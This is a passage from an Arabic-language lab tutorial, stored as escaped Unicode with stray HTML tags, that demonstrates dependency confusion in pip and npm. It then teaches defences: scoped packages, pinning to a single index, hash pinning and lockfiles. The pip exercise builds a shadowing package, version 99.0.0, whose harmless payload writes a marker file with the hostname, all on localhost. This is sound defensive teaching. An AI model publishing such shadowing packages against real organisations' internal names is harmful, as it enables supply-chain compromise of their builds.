\n- \u0623\u0633\u0645\u0627\u0621 \u0627\u0644\u062d\u0632\u0645 \u0628\u062f\u0648\u0646 \u0646\u0637\u0627\u0642 \u0645\u0648\u062c\u0648\u062f\u0629 \u0641\u064a \u0641\u0636\u0627\u0621 \u0627\u0633\u0645 \u0639\u0627\u0644\u0645\u064a \u0648\u0627\u062d\u062f.<\/strong> \u0644\u0627 \u0634\u064a\u0621 \u064a\u0645\u0646\u0639 \u0623\u064a \u0634\u062e\u0635 \u0645\u0646 \u0646\u0634\u0631
auth-utils<\/code> \u0639\u0644\u0649 npmjs.com.<\/li>\n- \u0623\u062f\u0648\u0627\u062a \u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u062d\u0632\u0645 \u062a\u0641\u0636\u0644 \u0623\u0639\u0644\u0649 \u0625\u0635\u062f\u0627\u0631.<\/strong> \u0639\u0646\u062f\u0645\u0627 \u064a\u062c\u0645\u0639 \u0633\u062c\u0644 \u0648\u0643\u064a\u0644 \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u0645\u062a\u0639\u062f\u062f\u0629\u060c \u0627\u0644\u0625\u0635\u062f\u0627\u0631
99.0.0<\/code> \u064a\u062a\u0641\u0648\u0642 \u0639\u0644\u0649 1.0.0<\/code>.<\/li>\n- \u0633\u0643\u0631\u0628\u062a\u0627\u062a \u062f\u0648\u0631\u0629 \u0627\u0644\u062d\u064a\u0627\u0629 \u062a\u064f\u0646\u0641\u064e\u0651\u0630 \u062a\u0644\u0642\u0627\u0626\u064a\u064b\u0627.<\/strong> \u064a\u0639\u0645\u0644 hook \u0627\u0644\u0640
postinstall<\/code> \u0628\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0646\u0638\u0627\u0645 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0623\u062b\u0646\u0627\u0621 \u0627\u0644\u062a\u062b\u0628\u064a\u062a.<\/li>\n<\/ol>\n\u0627\u0644\u062a\u0645\u0631\u064a\u0646 2: \u0627\u0644\u0647\u062c\u0648\u0645 \u2014 pip<\/h2>\n
\u0646\u0641\u0633 \u0641\u0626\u0629 \u0627\u0644\u062b\u063a\u0631\u0629 \u0645\u0648\u062c\u0648\u062f\u0629 \u0641\u064a \u0646\u0638\u0627\u0645 Python \u0627\u0644\u0628\u064a\u0626\u064a. \u062f\u0639\u0646\u0627 \u0646\u0648\u0636\u062d\u0647\u0627 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 pip.<\/p>\n
\u0627\u0644\u062e\u0637\u0648\u0629 1: \u062a\u0634\u063a\u064a\u0644 \u062e\u0627\u062f\u0645 PyPI \u0645\u062d\u0644\u064a<\/h3>\n# Start pypiserver as the \"private\" PyPI\nmkdir -p ~\/dep-confusion-lab\/pypi-private\ndocker run -d -p 8080:8080 --name pypi-private \\\n -v ~\/dep-confusion-lab\/pypi-private:\/data\/packages \\\n pypiserver\/pypiserver:latest run -P . -a . \/data\/packages\n\n# Start a second pypiserver as the \"public\" PyPI\nmkdir -p ~\/dep-confusion-lab\/pypi-public\ndocker run -d -p 8081:8080 --name pypi-public \\\n -v ~\/dep-confusion-lab\/pypi-public:\/data\/packages \\\n pypiserver\/pypiserver:latest run -P . -a . \/data\/packages<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0625\u0646\u0634\u0627\u0621 \u0648\u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u062d\u0632\u0645\u0629 \u0627\u0644\u0634\u0631\u0639\u064a\u0629 \u0627\u0644\u062e\u0627\u0635\u0629<\/h3>\nmkdir -p ~\/dep-confusion-lab\/py-private-pkg\/internal_utils\ncd ~\/dep-confusion-lab\/py-private-pkg<\/code><\/pre>\n\u0623\u0646\u0634\u0626 setup.py<\/code>:<\/p>\nfrom setuptools import setup, find_packages\n\nsetup(\n name='internal-utils',\n version='1.0.0',\n packages=find_packages(),\n description='Internal utilities (PRIVATE - LEGITIMATE)',\n)<\/code><\/pre>\n\u0623\u0646\u0634\u0626 internal_utils\/__init__.py<\/code>:<\/p>\ndef process_data(data):\n print('[internal-utils v1.0.0] Processing data (PRIVATE - LEGITIMATE)')\n return data<\/code><\/pre>\n\u0627\u0628\u0646\u0650 \u0648\u062d\u0645\u0651\u0644 \u0625\u0644\u0649 PyPI \u0627\u0644\u062e\u0627\u0635:<\/p>\n
python3 -m build\ntwine upload --repository-url http:\/\/localhost:8080 dist\/*<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u062d\u0632\u0645\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0627\u0644\u0639\u0627\u0645\u0629<\/h3>\nmkdir -p ~\/dep-confusion-lab\/py-malicious-pkg\/internal_utils\ncd ~\/dep-confusion-lab\/py-malicious-pkg<\/code><\/pre>\n\u0623\u0646\u0634\u0626 setup.py<\/code> \u0628\u0627\u0644\u0625\u0635\u062f\u0627\u0631 99.0.0<\/code>:<\/p>\nfrom setuptools import setup, find_packages\n\nsetup(\n name='internal-utils',\n version='99.0.0',\n packages=find_packages(),\n description='Malicious package simulating dependency confusion',\n)<\/code><\/pre>\n\u0623\u0646\u0634\u0626 internal_utils\/__init__.py<\/code>:<\/p>\nimport os\nimport datetime\n\ndef process_data(data):\n print('[internal-utils v99.0.0] Processing data (PUBLIC - MALICIOUS)')\n marker_path = os.path.expanduser('~\/dep-confusion-lab\/PIP_ATTACK_MARKER.txt')\n with open(marker_path, 'w') as f:\n f.write(f'PIP DEPENDENCY CONFUSION ATTACK SIMULATION\\n')\n f.write(f'Timestamp: {datetime.datetime.now().isoformat()}\\n')\n f.write(f'Hostname: {os.uname().nodename}\\n')\n return data<\/code><\/pre>\n\u0627\u0628\u0646\u0650 \u0648\u062d\u0645\u0651\u0644 \u0625\u0644\u0649 PyPI “\u0627\u0644\u0639\u0627\u0645”:<\/p>\n
python3 -m build\ntwine upload --repository-url http:\/\/localhost:8081 dist\/*<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 4: \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0647\u062c\u0648\u0645<\/h3>\n# Create a virtual environment for isolation\ncd ~\/dep-confusion-lab\npython3 -m venv lab-venv\nsource lab-venv\/bin\/activate\n\n# Install with --extra-index-url (the dangerous pattern)\npip install internal-utils \\\n --index-url http:\/\/localhost:8080\/simple\/ \\\n --extra-index-url http:\/\/localhost:8081\/simple\/<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 5: \u0627\u0644\u062a\u062d\u0642\u0642<\/h3>\npython3 -c \"import internal_utils; internal_utils.process_data('test')\"\n# Output: [internal-utils v99.0.0] Processing data (PUBLIC - MALICIOUS)\n\ncat ~\/dep-confusion-lab\/PIP_ATTACK_MARKER.txt<\/code><\/pre>\n\u0641\u0647\u0645 \u0645\u0646\u0637\u0642 \u0627\u0644\u062d\u0644 \u0641\u064a pip<\/h3>\n
\u0627\u0644\u062a\u0645\u064a\u064a\u0632 \u0627\u0644\u062d\u0627\u0633\u0645 \u0647\u0648 \u0628\u064a\u0646 --index-url<\/code> \u0648 --extra-index-url<\/code>:<\/p>\n\n--index-url<\/code>: \u064a\u062d\u062f\u062f \u0641\u0647\u0631\u0633 \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u0623\u0633\u0627\u0633\u064a<\/strong>. \u064a\u0628\u062d\u062b pip \u0647\u0646\u0627 \u0623\u0648\u0644\u0627\u064b.<\/li>\n--extra-index-url<\/code>: \u064a\u0636\u064a\u0641 \u0641\u0647\u0631\u0633\u064b\u0627 \u0625\u0636\u0627\u0641\u064a\u064b\u0627<\/strong>. \u064a\u0628\u062d\u062b pip \u0641\u064a \u062c\u0645\u064a\u0639<\/strong> \u0627\u0644\u0641\u0647\u0627\u0631\u0633 \u0627\u0644\u0645\u0643\u0648\u0651\u0646\u0629 \u0648\u064a\u062b\u0628\u0651\u062a \u0623\u0639\u0644\u0649 \u0625\u0635\u062f\u0627\u0631 \u0645\u0648\u062c\u0648\u062f \u0639\u0628\u0631 \u062c\u0645\u064a\u0639\u0647\u0627<\/strong>.<\/li>\n<\/ul>\n\u0647\u0630\u0627 \u064a\u0639\u0646\u064a \u0623\u0646\u0647 \u0639\u0646\u062f \u0627\u0633\u062a\u062e\u062f\u0627\u0645 --extra-index-url<\/code>\u060c \u0644\u0627 \u064a\u064f\u0641\u0636\u0651\u0644 pip \u0641\u0647\u0631\u0633\u0643 \u0627\u0644\u062e\u0627\u0635 \u2014 \u0628\u0644 \u064a\u062f\u0645\u062c \u0627\u0644\u0646\u062a\u0627\u0626\u062c \u0645\u0646 \u062c\u0645\u064a\u0639 \u0627\u0644\u0641\u0647\u0627\u0631\u0633 \u0648\u064a\u062e\u062a\u0627\u0631 \u0623\u0639\u0644\u0649 \u0625\u0635\u062f\u0627\u0631. \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0630\u064a \u064a\u0646\u0634\u0631 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 99.0.0<\/code> \u0639\u0644\u0649 \u0623\u064a \u0641\u0647\u0631\u0633 \u0645\u0643\u0648\u0651\u0646 \u0633\u064a\u0641\u0648\u0632.<\/p>\n\u0627\u0644\u062a\u0645\u0631\u064a\u0646 3: \u0627\u0644\u062f\u0641\u0627\u0639 \u2014 \u062a\u062d\u062f\u064a\u062f \u0646\u0637\u0627\u0642 \u0641\u0636\u0627\u0621 \u0627\u0644\u0623\u0633\u0645\u0627\u0621 (npm)<\/h2>\n
\u0623\u0643\u062b\u0631 \u0627\u0644\u062f\u0641\u0627\u0639\u0627\u062a \u0641\u0639\u0627\u0644\u064a\u0629 \u0644\u0640 npm \u0647\u0648 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u062d\u0632\u0645 \u0630\u0627\u062a \u0627\u0644\u0646\u0637\u0627\u0642. \u0627\u0644\u0646\u0637\u0627\u0642\u0627\u062a \u062a\u0646\u0634\u0626 \u0641\u0636\u0627\u0621 \u0623\u0633\u0645\u0627\u0621 \u064a\u0631\u062a\u0628\u0637 \u0645\u0628\u0627\u0634\u0631\u0629 \u0628\u0633\u062c\u0644 \u0645\u062d\u062f\u062f\u060c \u0645\u0645\u0627 \u064a\u0632\u064a\u0644 \u0627\u0644\u063a\u0645\u0648\u0636 \u0627\u0644\u0630\u064a \u064a\u062c\u0639\u0644 dependency confusion \u0645\u0645\u0643\u0646\u064b\u0627.<\/p>\n
\u0627\u0644\u062e\u0637\u0648\u0629 1: \u0627\u0644\u062a\u0623\u0643\u062f \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u062d\u0632\u0645\u0629 \u0630\u0627\u062a \u0627\u0644\u0646\u0637\u0627\u0642<\/h3>\n
\u0644\u0642\u062f \u0646\u0634\u0631\u0646\u0627 \u0628\u0627\u0644\u0641\u0639\u0644 @mycompany\/auth-utils@1.0.0<\/code> \u0639\u0644\u0649 \u0627\u0644\u0633\u062c\u0644 \u0627\u0644\u062e\u0627\u0635 \u0641\u064a \u0645\u0631\u062d\u0644\u0629 \u0627\u0644\u0625\u0639\u062f\u0627\u062f. \u062a\u062d\u0642\u0642 \u0645\u0646\u0647\u0627:<\/p>\nnpm view @mycompany\/auth-utils --registry http:\/\/localhost:4873<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 2: \u062a\u0643\u0648\u064a\u0646 \u062a\u0648\u062c\u064a\u0647 \u0627\u0644\u0633\u062c\u0644 \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u0627\u0644\u0646\u0637\u0627\u0642<\/h3>\n
\u0641\u064a \u0645\u0634\u0631\u0648\u0639 \u0627\u0644\u0636\u062d\u064a\u0629\u060c \u062d\u062f\u0651\u062b .npmrc<\/code>:<\/p>\n@mycompany:registry=http:\/\/localhost:4873\nregistry=http:\/\/localhost:4874<\/code><\/pre>\n\u0647\u0630\u0627 \u0627\u0644\u062a\u0643\u0648\u064a\u0646 \u064a\u062e\u0628\u0631 npm: “\u0644\u0623\u064a \u062d\u0632\u0645\u0629 \u062a\u062d\u062a \u0646\u0637\u0627\u0642 @mycompany<\/code>\u060c \u0627\u0633\u062a\u062e\u062f\u0645 \u062f\u0627\u0626\u0645\u064b\u0627 \u0627\u0644\u0633\u062c\u0644 \u0627\u0644\u062e\u0627\u0635. \u0644\u0643\u0644 \u0634\u064a\u0621 \u0622\u062e\u0631\u060c \u0627\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0633\u062c\u0644 \u0627\u0644\u0639\u0627\u0645.”<\/p>\n\u0627\u0644\u062e\u0637\u0648\u0629 3: \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u062a\u0628\u0639\u064a\u0629<\/h3>\n
\u062d\u062f\u0651\u062b package.json<\/code> \u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0627\u0633\u0645 \u0630\u064a \u0627\u0644\u0646\u0637\u0627\u0642:<\/p>\n{\n \"name\": \"victim-project\",\n \"version\": \"1.0.0\",\n \"dependencies\": {\n \"@mycompany\/auth-utils\": \"^1.0.0\"\n }\n}<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0648\u0627\u0644\u062a\u062d\u0642\u0642<\/h3>\nrm -rf node_modules package-lock.json\nnpm install<\/code><\/pre>\nnode -e \"const pkg = require('.\/node_modules\/@mycompany\/auth-utils\/package.json'); console.log(pkg.name, pkg.version);\"\n# Output: @mycompany\/auth-utils 1.0.0<\/code><\/pre>\n\u062a\u062d\u0642\u0642 \u0645\u0646 \u0639\u062f\u0645 \u0625\u0646\u0634\u0627\u0621 \u0645\u0644\u0641 \u0627\u0644\u062a\u0639\u0631\u064a\u0641:<\/p>\n
ls ~\/dep-confusion-lab\/ATTACK_MARKER.txt 2>&1\n# Output: No such file or directory<\/code><\/pre>\n\u0644\u0645\u0627\u0630\u0627 \u064a\u0646\u062c\u062d \u0647\u0630\u0627<\/h3>\n
\u0627\u0644\u062d\u0632\u0645 \u0630\u0627\u062a \u0627\u0644\u0646\u0637\u0627\u0642 \u0645\u062d\u062f\u062f\u0629 \u0628\u0641\u0636\u0627\u0621 \u0623\u0633\u0645\u0627\u0621<\/strong>. \u0627\u0644\u0646\u0637\u0627\u0642 @mycompany<\/code> \u0645\u0631\u062a\u0628\u0637 \u0628\u0633\u062c\u0644 \u0645\u062d\u062f\u062f \u0641\u064a .npmrc<\/code>. \u0644\u0646 \u064a\u062a\u0631\u0627\u062c\u0639 npm \u0623\u0628\u062f\u064b\u0627<\/strong> \u0625\u0644\u0649 \u0633\u062c\u0644 \u0622\u062e\u0631 \u0644\u0644\u062d\u0632\u0645 \u0630\u0627\u062a \u0627\u0644\u0646\u0637\u0627\u0642 \u2014 \u0628\u0644 \u064a\u0631\u0633\u0644 \u0627\u0644\u0637\u0644\u0628 \u0625\u0644\u0649 \u0633\u062c\u0644 \u0648\u0627\u062d\u062f \u0628\u0627\u0644\u0636\u0628\u0637. \u0644\u0627 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0646\u0634\u0631 @mycompany\/auth-utils<\/code> \u0639\u0644\u0649 npmjs.com \u0645\u0627 \u0644\u0645 \u064a\u0645\u062a\u0644\u0643 \u0645\u0624\u0633\u0633\u0629 @mycompany<\/code> \u0639\u0644\u0649 npm\u060c \u0648\u0627\u0644\u062a\u064a \u064a\u062a\u062d\u0643\u0645 \u0641\u064a\u0647\u0627 \u0641\u0631\u064a\u0642\u0643.<\/p>\n\u0627\u0644\u062a\u0645\u0631\u064a\u0646 4: \u0627\u0644\u062f\u0641\u0627\u0639 \u2014 \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u0633\u062c\u0644 (pip)<\/h2>\n
\u0628\u0627\u0644\u0646\u0633\u0628\u0629 \u0644\u0640 Python\u060c \u0627\u0644\u062f\u0641\u0627\u0639 \u0627\u0644\u0645\u0643\u0627\u0641\u0626 \u0647\u0648 \u062a\u062b\u0628\u064a\u062a \u062a\u0643\u0648\u064a\u0646 pip \u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0641\u0647\u0631\u0633\u0643 \u0627\u0644\u062e\u0627\u0635 \u0641\u0642\u0637\u060c \u0628\u062f\u0648\u0646 \u062a\u0631\u0627\u062c\u0639.<\/p>\n
\u0627\u0644\u062e\u064a\u0627\u0631 \u0623: \u0627\u0633\u062a\u062e\u062f\u0627\u0645 --index-url<\/code> \u0641\u0642\u0637 (\u0628\u062f\u0648\u0646 \u0641\u0647\u0627\u0631\u0633 \u0625\u0636\u0627\u0641\u064a\u0629)<\/h3>\n\u0623\u0646\u0634\u0626 \u0623\u0648 \u062d\u062f\u0651\u062b pip.conf<\/code> (Linux\/macOS: ~\/.config\/pip\/pip.conf<\/code>\u061b Windows: %APPDATA%\\pip\\pip.ini<\/code>):<\/p>\n[global]\nindex-url = http:\/\/localhost:8080\/simple\/\n# Do NOT add extra-index-url<\/code><\/pre>\n\u0627\u0644\u0622\u0646 \u0623\u0639\u062f \u0627\u0644\u062a\u062b\u0628\u064a\u062a:<\/p>\n
pip install internal-utils --index-url http:\/\/localhost:8080\/simple\/\n\npython3 -c \"import internal_utils; internal_utils.process_data('test')\"\n# Output: [internal-utils v1.0.0] Processing data (PRIVATE - LEGITIMATE)<\/code><\/pre>\n\u0628\u062d\u0630\u0641 --extra-index-url<\/code> \u0628\u0627\u0644\u0643\u0627\u0645\u0644\u060c \u064a\u0628\u062d\u062b pip \u0641\u0642\u0637 \u0641\u064a \u0633\u062c\u0644\u0643 \u0627\u0644\u062e\u0627\u0635. \u0627\u0644\u062d\u0632\u0645\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0639\u0644\u0649 localhost:8081<\/code> \u0644\u0627 \u064a\u062a\u0645 \u0627\u0644\u0631\u062c\u0648\u0639 \u0625\u0644\u064a\u0647\u0627 \u0623\u0628\u062f\u064b\u0627.<\/p>\n\u0627\u0644\u062e\u064a\u0627\u0631 \u0628: \u0627\u0633\u062a\u062e\u062f\u0627\u0645 --require-hashes<\/code> \u0641\u064a requirements.txt<\/code><\/h3>\n\u0647\u0630\u0627 \u0627\u0644\u0646\u0647\u062c \u064a\u062b\u0628\u0651\u062a \u0643\u0644 \u062a\u0628\u0639\u064a\u0629 \u0628\u0634\u0643\u0644 \u062a\u0634\u0641\u064a\u0631\u064a \u0644\u0645\u0644\u0641 \u0645\u062d\u062f\u062f:<\/p>\n
# First, generate the hash of the legitimate package\npip hash ~\/dep-confusion-lab\/py-private-pkg\/dist\/internal_utils-1.0.0.tar.gz<\/code><\/pre>\n\u0623\u0646\u0634\u0626 requirements.txt<\/code> \u0645\u0639 hash:<\/p>\ninternal-utils==1.0.0 --hash=sha256:<paste-the-hash-from-above><\/code><\/pre>\n\u062b\u0628\u0651\u062a \u0645\u0639 \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 hash:<\/p>\n
pip install -r requirements.txt \\\n --index-url http:\/\/localhost:8080\/simple\/ \\\n --extra-index-url http:\/\/localhost:8081\/simple\/<\/code><\/pre>\n\u062d\u062a\u0649 \u0645\u0639 \u062a\u0643\u0648\u064a\u0646 \u0627\u0644\u0641\u0647\u0631\u0633 \u0627\u0644\u0639\u0627\u0645\u060c \u0633\u064a\u0642\u0648\u0645 pip \u0628\u0640\u0631\u0641\u0636<\/strong> \u0623\u064a \u062d\u0632\u0645\u0629 \u0644\u0627 \u064a\u062a\u0637\u0627\u0628\u0642 hash \u0627\u0644\u062e\u0627\u0635 \u0628\u0647\u0627. \u0627\u0644\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u062e\u0628\u064a\u062b v99.0.0<\/code> \u0644\u0647 hash \u0645\u062e\u062a\u0644\u0641 \u0648\u0633\u064a\u062a\u0645 \u0631\u0641\u0636\u0647.<\/p>\n\u0644\u0645\u0627\u0630\u0627 \u064a\u0646\u062c\u062d \u0647\u0630\u0627<\/h3>\n
\u062a\u062b\u0628\u064a\u062a \u0627\u0644\u0633\u062c\u0644 \u064a\u0632\u064a\u0644 \u0641\u0631\u0635\u0629 \u062e\u0644\u0637 \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0645\u0646 \u062e\u0644\u0627\u0644 \u0636\u0645\u0627\u0646 \u0623\u0646 pip \u064a\u0633\u062a\u0634\u064a\u0631 \u0645\u0635\u062f\u0631\u064b\u0627 \u0648\u0627\u062d\u062f\u064b\u0627 \u0645\u0648\u062b\u0648\u0642\u064b\u0627 \u0641\u0642\u0637. \u062a\u062b\u0628\u064a\u062a hash \u064a\u0630\u0647\u0628 \u0623\u0628\u0639\u062f \u2014 \u062d\u062a\u0649 \u0644\u0648 \u0627\u062e\u062a\u0631\u0642 \u0645\u0647\u0627\u062c\u0645 \u0633\u062c\u0644\u0643 \u0627\u0644\u062e\u0627\u0635\u060c \u0641\u0625\u0646 \u0639\u062f\u0645 \u062a\u0637\u0627\u0628\u0642 hash \u0633\u064a\u0645\u0646\u0639 \u062a\u062b\u0628\u064a\u062a \u0645\u0644\u0641 \u062a\u0645 \u0627\u0644\u062a\u0644\u0627\u0639\u0628 \u0628\u0647.<\/p>\n
\u0627\u0644\u062a\u0645\u0631\u064a\u0646 5: \u0627\u0644\u062f\u0641\u0627\u0639 \u2014 \u0633\u0644\u0627\u0645\u0629 \u0645\u0644\u0641 \u0627\u0644\u0642\u0641\u0644<\/h2>\n
\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0642\u0641\u0644 (lockfiles) \u062a\u0633\u062c\u0644 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u062f\u0642\u064a\u0642 \u0648\u0639\u0646\u0648\u0627\u0646 URL \u0627\u0644\u0645\u0635\u062f\u0631 \u0648hash \u0627\u0644\u062a\u0634\u0641\u064a\u0631\u064a \u0644\u0643\u0644 \u062d\u0632\u0645\u0629 \u0645\u062b\u0628\u062a\u0629. \u0639\u0646\u062f \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0628\u0634\u0643\u0644 \u0635\u062d\u064a\u062d\u060c \u062a\u0645\u0646\u0639 dependency confusion \u0645\u0646 \u0627\u0644\u062a\u0623\u062b\u064a\u0631 \u0639\u0644\u0649 \u0628\u0646\u064a\u0627\u062a \u0627\u0644\u0625\u0646\u062a\u0627\u062c.<\/p>\n
\u0627\u0644\u062e\u0637\u0648\u0629 1: \u0625\u0646\u0634\u0627\u0621 \u0645\u0644\u0641 \u0642\u0641\u0644 \u0646\u0638\u064a\u0641<\/h3>\ncd ~\/dep-confusion-lab\/victim-project\nrm -rf node_modules package-lock.json\nnpm install<\/code><\/pre>\n\u0627\u0641\u062d\u0635 \u0645\u0644\u0641 package-lock.json<\/code> \u0627\u0644\u0646\u0627\u062a\u062c:<\/p>\ncat package-lock.json | python3 -m json.tool | head -30<\/code><\/pre>\n\u0627\u0628\u062d\u062b \u0639\u0646 \u062d\u0642\u0644\u064a resolved<\/code> \u0648 integrity<\/code>:<\/p>\n\"node_modules\/@mycompany\/auth-utils\": {\n \"version\": \"1.0.0\",\n \"resolved\": \"http:\/\/localhost:4873\/@mycompany%2fauth-utils\/-\/auth-utils-1.0.0.tgz\",\n \"integrity\": \"sha512-abc123...\"\n}<\/code><\/pre>\n\u062d\u0642\u0644 resolved<\/code> \u064a\u0633\u062c\u0644 \u0639\u0646\u0648\u0627\u0646 URL \u0627\u0644\u062f\u0642\u064a\u0642 \u0627\u0644\u0630\u064a \u062a\u0645 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062d\u0632\u0645\u0629 \u0645\u0646\u0647. \u062d\u0642\u0644 integrity<\/code> \u0647\u0648 hash \u0645\u0646 \u0646\u0648\u0639 Subresource Integrity (SRI) \u0644\u0645\u0644\u0641 tarball.<\/p>\n\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0627\u0633\u062a\u062e\u062f\u0627\u0645 npm ci<\/code> \u0628\u062f\u0644\u0627\u064b \u0645\u0646 npm install<\/code><\/h3>\n\u0623\u0645\u0631 npm ci<\/code> \u0645\u0635\u0645\u0645 \u0644\u0628\u064a\u0626\u0627\u062a CI\/CD:<\/p>\n# In CI, always use:\nnpm ci<\/code><\/pre>\n\u0627\u0644\u0641\u0631\u0648\u0642 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629 \u0639\u0646 npm install<\/code>:<\/p>\n